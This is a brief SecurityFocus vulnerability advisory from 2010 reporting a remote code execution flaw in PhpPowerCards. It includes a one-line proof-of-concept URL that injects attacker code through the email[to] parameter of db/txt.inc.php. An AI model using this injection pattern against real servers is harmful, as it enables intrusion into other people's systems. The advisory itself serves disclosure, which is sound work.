PhpPowerCards Remote Code Execution Vulnerability

Attackers can exploit this issue via a web client.

A proof of concept demonstrating this issue is as follows:

http://www.example.com/[path]/db/txt.inc.php?file=[file]&check=0&email[to]=attackers_code


 

Privacy Statement
Copyright 2010, SecurityFocus